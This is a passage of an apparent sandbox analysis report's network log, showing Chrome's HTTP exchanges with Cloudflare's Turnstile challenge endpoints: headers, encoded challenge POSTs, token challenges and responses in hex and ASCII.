                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:22 UTC143INHTTP/1.1 401 Unauthorized
                                                                  Date: Mon, 30 Dec 2024 21:42:22 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 1
                                                                  Connection: close
                                                                  2024-12-30 21:42:22 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 6f 48 4a 6a 61 48 45 72 4a 38 57 67 6d 53 34 59 68 35 47 57 6c 54 51 46 43 66 52 41 49 5f 74 6a 65 4c 6a 63 70 56 48 31 5f 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwoHJjaHErJ8WgmS4Yh5GWlTQFCfRAI_tjeLjcpVH1_IAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                  2024-12-30 21:42:22 UTC1INData Raw: 4a
                                                                  Data Ascii: J


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.449768104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:23 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 26513
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:23 UTC16384OUTData Raw: 76 5f 38 66 61 35 33 32 65 66 31 38 62 39 34 33 35 63 3d 42 6e 5a 65 50 32 39 64 43 6a 6e 39 43 44 64 39 6c 51 6b 51 74 44 70 39 56 42 51 24 51 78 65 6a 45 51 64 51 73 65 30 43 32 68 51 4d 34 4f 5a 6f 45 32 31 51 4f 65 47 5a 65 51 73 5a 74 51 66 65 31 5a 5a 5a 35 70 51 70 46 51 53 65 6a 71 31 5a 51 6a 5a 51 41 51 32 43 39 59 51 44 5a 39 7a 41 42 6f 65 51 6d 51 44 74 4e 51 41 44 59 39 43 59 57 36 65 6a 70 51 32 78 5a 39 4d 4e 51 62 72 64 54 75 65 36 6f 6c 24 6a 67 32 51 51 62 4e 51 42 43 65 30 6a 5a 51 71 65 59 79 51 32 49 6e 73 65 32 6c 5a 68 44 78 51 70 6e 51 49 50 44 58 4e 6b 47 72 68 4f 51 68 45 50 44 52 75 39 47 68 70 65 59 6a 78 4f 59 7a 30 32 52 37 73 65 51 31 68 79 44 78 64 30 49 70 52 39 6f 78 66 63 58 77 44 63 4e 51 79 38 4e 42 45 74 73 4a 6b 66
                                                                  Data Ascii: v_8fa532ef18b9435c=BnZeP29dCjn9CDd9lQkQtDp9VBQ$QxejEQdQse0C2hQM4OZoE21QOeGZeQsZtQfe1ZZZ5pQpFQSejq1ZQjZQAQ2C9YQDZ9zABoeQmQDtNQADY9CYW6ejpQ2xZ9MNQbrdTue6ol$jg2QQbNQBCe0jZQqeYyQ2Inse2lZhDxQpnQIPDXNkGrhOQhEPDRu9GhpeYjxOYz02R7seQ1hyDxd0IpR9oxfcXwDcNQy8NBEtsJkf
                                                                  2024-12-30 21:42:23 UTC10129OUTData Raw: 5a 56 37 2d 35 57 75 42 52 2b 5a 62 5a 39 69 24 79 44 76 46 53 65 59 37 62 5a 70 32 77 4f 51 4f 51 6a 5a 51 51 32 76 31 32 39 45 32 46 37 61 69 34 51 51 58 51 54 51 47 41 59 6d 51 76 6e 39 46 52 30 5a 45 65 62 51 6a 65 39 50 43 44 51 32 37 51 78 51 30 65 39 4b 51 7a 51 31 4e 59 4e 51 50 74 62 4f 32 75 51 48 51 5a 4f 32 73 51 44 65 70 37 59 2d 51 75 65 5a 4b 24 46 51 65 65 6f 65 59 78 51 75 73 36 5a 59 30 51 49 65 6f 43 39 64 51 31 65 36 43 39 31 65 36 65 31 45 59 6c 51 71 65 5a 6e 59 31 51 6b 65 39 6e 39 45 39 42 51 68 51 51 43 39 35 51 68 51 59 37 51 58 51 31 65 32 45 51 6c 6e 74 4f 50 67 51 2b 51 42 45 6f 61 4d 53 51 32 43 39 62 51 30 65 36 45 55 64 51 77 51 4e 5a 32 78 51 72 78 47 4f 6a 34 51 77 6e 32 51 39 67 51 4b 65 5a 45 39 4f 51 6b 51 64 48 51 64
                                                                  Data Ascii: ZV7-5WuBR+ZbZ9i$yDvFSeY7bZp2wOQOQjZQQ2v129E2F7ai4QQXQTQGAYmQvn9FR0ZEebQje9PCDQ27QxQ0e9KQzQ1NYNQPtbO2uQHQZO2sQDep7Y-QueZK$FQeeoeYxQus6ZY0QIeoC9dQ1e6C91e6e1EYlQqeZnY1Qke9n9E9BQhQQC95QhQY7QXQ1e2EQlntOPgQ+QBEoaMSQ2C9bQ0e6EUdQwQNZ2xQrxGOj4Qwn2Q9gQKeZE9OQkQdHQd
                                                                  2024-12-30 21:42:23 UTC334INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:23 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 22928
                                                                  Connection: close
                                                                  cf-chl-gen: 4j0I8pAIAg2Sk5sq6z6egoRQGeEjKHAycuC188zEK0CMGoo16ZkfdW8iBV6TJDDszZrvecp3z8H0jYu9Ww==$04P5dZhXpv0zNx7N
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5330a1d587c9c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:23 UTC1035INData Raw: 75 36 36 30 71 37 66 41 65 4b 71 4a 73 38 4f 39 73 38 57 37 77 73 4a 39 66 39 4c 56 6c 48 72 53 78 63 76 43 7a 74 65 50 77 62 36 55 77 71 4f 4f 79 5a 43 6c 69 2b 50 57 33 4e 50 66 36 4b 44 53 7a 36 62 54 74 4a 2f 62 6f 62 61 63 6e 5a 36 66 39 75 4c 30 6f 2b 50 6f 37 4f 62 72 38 66 62 71 37 77 49 48 72 38 32 78 38 77 62 37 43 77 54 38 42 77 34 4f 39 73 7a 36 32 61 6e 41 77 63 4c 44 47 77 63 5a 78 78 77 50 47 52 44 2b 45 79 41 6c 46 69 55 6e 30 2f 48 56 47 43 6f 67 4c 79 67 68 4b 7a 49 79 47 2f 45 66 2f 63 33 4f 35 65 62 6e 36 44 4d 78 36 2f 51 74 4d 6a 59 77 4e 54 74 41 4e 44 6c 4c 55 41 64 49 53 6b 5a 50 44 2f 34 64 48 68 38 44 46 41 34 47 59 76 48 79 43 67 73 4d 44 51 34 50 45 42 46 52 56 6c 70 55 57 56 39 6b 57 46 31 76 64 42 30 37 48 33 73 4c 49 69 4d
                                                                  Data Ascii: u660q7fAeKqJs8O9s8W7wsJ9f9LVlHrSxcvCztePwb6UwqOOyZCli+PW3NPf6KDSz6bTtJ/bobacnZ6f9uL0o+Po7Obr8fbq7wIHr82x8wb7CwT8Bw4O9sz62anAwcLDGwcZxxwPGRD+EyAlFiUn0/HVGCogLyghKzIyG/Ef/c3O5ebn6DMx6/QtMjYwNTtANDlLUAdISkZPD/4dHh8DFA4GYvHyCgsMDQ4PEBFRVlpUWV9kWF1vdB07H3sLIiM
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 76 63 48 46 79 63 36 69 72 75 4b 36 4e 6b 33 72 53 78 63 76 43 7a 74 65 50 77 63 62 4b 78 4d 6e 50 31 4d 6a 5a 32 2b 43 62 30 64 66 63 73 75 4c 63 36 72 37 61 6f 34 4b 5a 6d 70 75 63 6e 5a 36 66 6f 4b 47 69 6f 36 54 52 31 2f 76 59 77 4d 53 72 42 50 62 38 38 77 41 4a 77 50 4c 33 2b 2f 58 36 41 51 62 35 43 77 30 53 7a 41 4d 4a 44 75 4d 55 44 76 67 51 48 41 34 56 45 43 58 59 74 38 37 50 30 4e 48 53 30 39 54 56 31 74 66 59 32 51 67 71 49 43 54 31 2b 65 41 35 4c 44 49 70 4e 54 37 31 4b 43 30 78 4b 7a 41 32 4f 79 39 41 51 6b 63 43 4f 44 35 44 47 55 6c 44 48 44 39 52 52 30 35 4f 44 65 73 44 42 41 55 47 42 77 67 4a 43 67 73 4d 44 51 35 41 4f 32 5a 44 56 79 55 76 46 6d 35 68 5a 31 35 71 63 79 74 64 59 6d 5a 67 5a 57 74 77 5a 48 56 33 66 44 64 74 63 33 68 4f 66 6e
                                                                  Data Ascii: vcHFyc6iruK6Nk3rSxcvCztePwcbKxMnP1MjZ2+Cb0dfcsuLc6r7ao4KZmpucnZ6foKGio6TR1/vYwMSrBPb88wAJwPL3+/X6AQb5Cw0SzAMJDuMUDvgQHA4VECXYt87P0NHS09TV1tfY2QgqICT1+eA5LDIpNT71KC0xKzA2Oy9AQkcCOD5DGUlDHD9RR05ODesDBAUGBwgJCgsMDQ5AO2ZDVyUvFm5hZ15qcytdYmZgZWtwZHV3fDdtc3hOfn
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 64 70 6e 52 75 73 79 50 6c 6e 33 56 79 4d 37 46 30 64 71 53 78 4d 6e 4e 78 38 7a 53 31 38 76 63 33 75 4f 65 76 75 48 64 76 36 69 57 70 4a 6a 77 34 2b 6e 67 37 50 57 74 33 2b 54 6f 34 75 66 74 38 75 62 33 2b 66 36 35 30 50 62 50 43 50 48 45 76 70 32 30 74 62 61 33 75 4c 6d 36 75 37 79 39 76 72 38 44 2b 68 66 6f 48 4e 66 67 78 79 41 54 47 52 41 63 4a 64 77 50 46 42 67 53 46 78 30 69 46 69 63 70 4c 75 67 65 46 6a 49 45 4e 2f 4c 74 7a 4f 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 37 6a 6c 44 4f 53 67 33 44 52 44 32 54 30 4a 49 50 30 74 55 44 44 35 44 52 30 46 47 54 46 46 46 56 6c 68 64 47 46 52 65 56 45 4e 53 4b 42 33 37 45 78 51 56 46 68 63 59 47 52 70 34 4e 77 63 49 48 79 41 68 49 69 4d 6b 4a 53 5a 39 61 58 73 71 63 58 35 38 65 31 4a 34 63 6f 52 57 67 33 6c
                                                                  Data Ascii: dpnRusyPln3VyM7F0dqSxMnNx8zS18vc3uOevuHdv6iWpJjw4+ng7PWt3+To4uft8ub3+f650PbPCPHEvp20tba3uLm6u7y9vr8D+hfoHNfgxyATGRAcJdwPFBgSFx0iFicpLugeFjIEN/LtzOPk5ebn6Onq6+zt7jlDOSg3DRD2T0JIP0tUDD5DR0FGTFFFVlhdGFReVENSKB37ExQVFhcYGRp4NwcIHyAhIiMkJSZ9aXsqcX58e1J4coRWg3l
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 6e 33 43 7a 73 50 57 7a 38 6a 53 32 5a 54 4a 31 38 33 6a 6d 64 58 62 33 4e 54 69 75 63 62 41 77 4a 57 7a 74 4c 57 5a 6f 64 66 71 70 49 69 66 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 71 61 71 78 73 71 33 79 2f 76 4d 48 41 50 67 44 43 73 51 41 2f 66 72 2b 79 51 41 4e 44 42 41 43 46 41 6a 6e 46 41 6b 63 46 51 34 59 48 2f 73 63 49 52 67 6b 47 69 45 68 32 78 6b 6c 47 69 30 6d 48 79 6b 77 36 69 41 75 4a 44 72 71 7a 4f 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 37 76 58 32 38 55 6f 39 51 7a 70 47 54 77 63 35 50 6b 49 38 51 55 64 4d 51 46 46 54 57 42 4e 57 55 43 74 64 58 78 73 61 58 6d 4e 55 59 6d 70 46 57 47 42 61 57 57 74 6e 61 79 49 69 62 33 46 33 61 32 55 6f 4b 7a 46 6e 64 48 4e 33 61 58 74 76 54 33 74 77 67 33 78 31 66 34 5a 6a 67 34 68 2f 69 34 47 49 69 45 4f 54
                                                                  Data Ascii: n3CzsPWz8jS2ZTJ183jmdXb3NTiucbAwJWztLWZodfqpIifoKGio6Slpqeoqaqxsq3y/vMHAPgDCsQA/fr+yQANDBACFAjnFAkcFQ4YH/scIRgkGiEh2xklGi0mHykw6iAuJDrqzOPk5ebn6Onq6+zt7vX28Uo9QzpGTwc5PkI8QUdMQFFTWBNWUCtdXxsaXmNUYmpFWGBaWWtnayIib3F3a2UoKzFndHN3aXtvT3twg3x1f4Zjg4h/i4GIiEOT
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 71 53 78 4d 6e 4e 78 38 7a 53 31 38 76 63 33 75 4f 65 34 64 75 32 36 4f 71 6d 70 65 6e 75 33 2b 33 31 30 4f 50 72 35 65 54 32 38 76 61 74 72 65 76 78 41 4c 47 30 74 61 32 30 72 37 6a 66 41 76 66 35 77 39 72 6d 32 2b 37 6e 34 4f 72 78 2f 65 2f 76 39 4f 76 33 37 66 54 30 42 2b 7a 79 2f 65 37 37 2b 2f 7a 30 38 77 62 33 39 39 51 79 31 67 59 6f 48 69 44 70 41 51 30 43 46 51 34 48 45 52 67 6b 46 68 59 62 45 68 34 55 47 78 73 74 46 52 38 64 48 69 49 72 48 69 51 65 39 31 58 35 4b 55 74 42 51 77 30 6b 4d 43 55 34 4d 53 6f 30 4f 30 63 35 4f 54 34 31 51 54 63 2b 50 6c 41 37 51 45 52 42 4f 30 51 39 52 30 34 38 55 45 5a 4e 54 56 39 55 55 6b 68 48 54 6b 78 51 53 7a 49 55 4b 79 77 74 4c 69 38 77 4d 54 4a 77 50 56 41 67 4e 7a 67 35 4f 70 67 6d 4a 7a 34 2f 51 45 47 42 68
                                                                  Data Ascii: qSxMnNx8zS18vc3uOe4du26Oqmpenu3+310OPr5eT28vatrevxALG0ta20r7jfAvf5w9rm2+7n4Orx/e/v9Ov37fT0B+zy/e77+/z08wb399Qy1gYoHiDpAQ0CFQ4HERgkFhYbEh4UGxstFR8dHiIrHiQe91X5KUtBQw0kMCU4MSo0O0c5OT41QTc+PlA7QERBO0Q9R048UEZNTV9UUkhHTkxQSzIUKywtLi8wMTJwPVAgNzg5OpgmJz4/QEGBh
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 4b 69 2b 50 57 33 4e 50 66 36 4b 44 4d 76 4f 7a 70 72 61 43 69 74 59 57 63 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 71 61 71 72 43 72 6d 75 77 4d 44 42 77 72 7a 50 6e 37 61 33 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 53 41 4a 45 52 6b 4d 49 37 4c 4a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 31 74 66 59 48 53 4d 66 4d 54 59 61 35 67 67 46 45 7a 33 36 37 43 54 6e 42 75 6e 2b 42 39 62 74 37 75 2f 77 38 66 4c 7a 39 50 58 32 39 2f 6a 35 2b 76 76 38 51 55 64 44 56 56 6f 2b 43 30 59 70 53 7a 67 64 45 55 67 55 46 76 63 50 45 42 45 53 45 78 51 56 46 68 63 59 47 52 70 34 42 68 30 65 48 79 41 68 49 69 4d 6b 4a 53 59 6e 4b 47 36 41 63 48 71 42 50 48 2b 43 64 6f 68 34 67 6f 6c 61 66 48 35 36 6a 34 65 51 52 55 64 61 4b 6b 46 43 51 30 52 46 52 6b 64 49 70 6d
                                                                  Data Ascii: Ki+PW3NPf6KDMvOzpraCitYWcnZ6foKGio6SlpqeoqaqrCrmuwMDBwrzPn7a3uLm6u7y9vr/AwSAJERkMI7LJysvMzc7P0NHS09TV1tfYHSMfMTYa5ggFEz367CTnBun+B9bt7u/w8fLz9PX29/j5+vv8QUdDVVo+C0YpSzgdEUgUFvcPEBESExQVFhcYGRp4Bh0eHyAhIiMkJSYnKG6AcHqBPH+Cdoh4golafH56j4eQRUdaKkFCQ0RFRkdIpm
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 6b 5a 4b 54 6c 4f 76 58 36 5a 6a 65 37 4f 33 72 37 38 66 74 35 76 44 52 35 65 37 71 36 66 75 6f 78 71 6f 48 6c 71 32 75 72 37 43 78 73 72 4f 30 74 62 61 33 75 4c 6d 36 75 37 77 4c 45 67 66 61 77 52 41 58 44 4e 47 77 78 38 6a 4a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 31 69 30 72 4a 76 54 62 4d 6a 41 72 36 38 72 68 34 75 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 37 75 2f 77 50 6a 78 43 4f 69 52 47 45 76 68 47 52 45 70 43 4c 45 34 4d 36 67 49 44 42 41 55 47 42 77 67 4a 43 67 73 4d 44 51 34 50 45 42 46 56 59 6d 42 71 59 32 56 47 61 44 51 62 58 32 78 71 64 47 31 76 55 48 49 77 44 79 59 6e 4b 43 6b 71 4b 79 77 74 4c 69 38 77 4d 54 49 7a 4e 44 56 37 69 59 71 49 6a 46 55 38 67 70 43 52 6a 35 4d 73 51 30 52 46 52 6b 64 49 53 55 70 4c 54 45 31 4f 72 47 73
                                                                  Data Ascii: kZKTlOvX6Zje7O3r78ft5vDR5e7q6fuoxqoHlq2ur7CxsrO0tba3uLm6u7wLEgfawRAXDNGwx8jJysvMzc7P0NHS09TV1i0rJvTbMjAr68rh4uPk5ebn6Onq6+zt7u/wPjxCOiRGEvhGREpCLE4M6gIDBAUGBwgJCgsMDQ4PEBFVYmBqY2VGaDQbX2xqdG1vUHIwDyYnKCkqKywtLi8wMTIzNDV7iYqIjFU8gpCRj5MsQ0RFRkdISUpLTE1OrGs
                                                                  2024-12-30 21:42:23 UTC1369INData Raw: 73 62 46 6f 61 65 47 6e 5a 36 66 6f 4b 47 69 6f 36 54 54 36 4d 37 39 75 73 53 72 72 73 44 74 38 4e 6a 30 78 2b 62 73 2b 51 30 45 44 73 6e 70 43 4c 37 4a 71 4c 2f 41 77 63 4c 44 78 4d 58 47 37 51 33 39 44 50 58 6a 35 38 37 57 41 67 58 2b 39 79 41 5a 41 75 37 37 36 79 6f 73 4e 50 51 79 44 44 67 79 38 75 34 38 4e 76 30 4d 4f 51 49 61 2f 6b 51 2b 53 52 51 38 43 68 34 5a 4a 45 49 48 46 56 56 4e 44 69 34 4f 55 79 34 6e 4a 46 55 73 4f 7a 6f 39 4e 31 6b 51 46 76 51 4d 44 51 34 50 45 42 45 53 45 32 70 42 55 45 51 71 4d 78 6f 6f 61 6d 4a 31 48 30 52 69 64 6d 67 73 4c 6a 52 75 62 58 31 65 64 48 6c 79 4e 6a 67 61 4d 54 49 7a 4e 4a 4a 52 49 54 67 35 4f 6a 73 6d 50 54 34 2f 51 49 42 39 67 6e 39 57 67 34 52 49 5a 6b 70 53 63 34 47 56 68 58 36 61 61 6c 70 76 50 31 5a 58
                                                                  Data Ascii: sbFoaeGnZ6foKGio6TT6M79usSrrsDt8Nj0x+bs+Q0EDsnpCL7JqL/AwcLDxMXG7Q39DPXj587WAgX+9yAZAu776yosNPQyDDgy8u48Nv0MOQIa/kQ+SRQ8Ch4ZJEIHFVVNDi4OUy4nJFUsOzo9N1kQFvQMDQ4PEBESE2pBUEQqMxooamJ1H0RidmgsLjRubX1edHlyNjgaMTIzNJJRITg5OjsmPT4/QIB9gn9Wg4RIZkpSc4GVhX6aalpvP1ZX


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.449769104.18.95.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:23 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:23 UTC379INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:23 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: ipE79ZCaC1Uh8plCsPiGmeJUWRYXXEzxHh4=$EtDwwsn0DhmRJ0ia
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5330f3a41de96-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:23 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.458479104.18.94.41443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:31 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 28517
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:31 UTC16384OUTData Raw: 76 5f 38 66 61 35 33 32 65 66 31 38 62 39 34 33 35 63 3d 42 6e 5a 65 50 32 39 64 43 6a 6e 39 43 44 64 39 6c 51 6b 51 74 44 70 39 56 42 51 24 51 78 65 6a 45 51 64 51 73 65 30 43 32 68 51 4d 34 4f 5a 6f 45 32 31 51 4f 65 47 5a 65 51 73 5a 74 51 66 65 31 5a 5a 5a 35 70 51 70 46 51 53 65 6a 71 31 5a 51 6a 5a 51 41 51 32 43 39 59 51 44 5a 39 7a 41 42 6f 65 51 6d 51 44 74 4e 51 41 44 59 39 43 59 57 36 65 6a 70 51 32 78 5a 39 4d 4e 51 62 72 64 54 75 65 36 6f 6c 24 6a 67 32 51 51 62 4e 51 42 43 65 30 6a 5a 51 71 65 59 79 51 32 49 6e 73 65 32 6c 5a 68 44 78 51 70 6e 51 49 50 44 58 4e 6b 47 72 68 4f 51 68 45 50 44 52 75 39 47 68 70 65 59 6a 78 4f 59 7a 30 32 52 37 73 65 51 31 68 79 44 78 64 30 49 70 52 39 6f 78 66 63 58 77 44 63 4e 51 79 38 4e 42 45 74 73 4a 6b 66
                                                                  Data Ascii: v_8fa532ef18b9435c=BnZeP29dCjn9CDd9lQkQtDp9VBQ$QxejEQdQse0C2hQM4OZoE21QOeGZeQsZtQfe1ZZZ5pQpFQSejq1ZQjZQAQ2C9YQDZ9zABoeQmQDtNQADY9CYW6ejpQ2xZ9MNQbrdTue6ol$jg2QQbNQBCe0jZQqeYyQ2Inse2lZhDxQpnQIPDXNkGrhOQhEPDRu9GhpeYjxOYz02R7seQ1hyDxd0IpR9oxfcXwDcNQy8NBEtsJkf
                                                                  2024-12-30 21:42:31 UTC12133OUTData Raw: 5a 56 37 2d 35 57 75 42 52 2b 5a 62 5a 39 69 24 79 44 76 46 53 65 59 37 62 5a 70 32 77 4f 51 4f 51 6a 5a 51 51 32 76 31 32 39 45 32 46 37 61 69 34 51 51 58 51 54 51 47 41 59 6d 51 76 6e 39 46 52 30 5a 45 65 62 51 6a 65 39 50 43 44 51 32 37 51 78 51 30 65 39 4b 51 7a 51 31 4e 59 4e 51 50 74 62 4f 32 75 51 48 51 5a 4f 32 73 51 44 65 70 37 59 2d 51 75 65 5a 4b 24 46 51 65 65 6f 65 59 78 51 75 73 36 5a 59 30 51 49 65 6f 43 39 64 51 31 65 36 43 39 31 65 36 65 31 45 59 6c 51 71 65 5a 6e 59 31 51 6b 65 39 6e 39 45 39 42 51 68 51 51 43 39 35 51 68 51 59 37 51 58 51 31 65 32 45 51 6c 6e 74 4f 50 67 51 2b 51 42 45 6f 61 4d 53 51 32 43 39 62 51 30 65 36 45 55 64 51 77 51 4e 5a 32 78 51 72 78 47 4f 6a 34 51 77 6e 32 51 39 67 51 4b 65 5a 45 39 4f 51 6b 51 64 48 51 64
                                                                  Data Ascii: ZV7-5WuBR+ZbZ9i$yDvFSeY7bZp2wOQOQjZQQ2v129E2F7ai4QQXQTQGAYmQvn9FR0ZEebQje9PCDQ27QxQ0e9KQzQ1NYNQPtbO2uQHQZO2sQDep7Y-QueZK$FQeeoeYxQus6ZY0QIeoC9dQ1e6C91e6e1EYlQqeZnY1Qke9n9E9BQhQQC95QhQY7QXQ1e2EQlntOPgQ+QBEoaMSQ2C9bQ0e6EUdQwQNZ2xQrxGOj4Qwn2Q9gQKeZE9OQkQdHQd
                                                                  2024-12-30 21:42:31 UTC1343INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:31 GMT
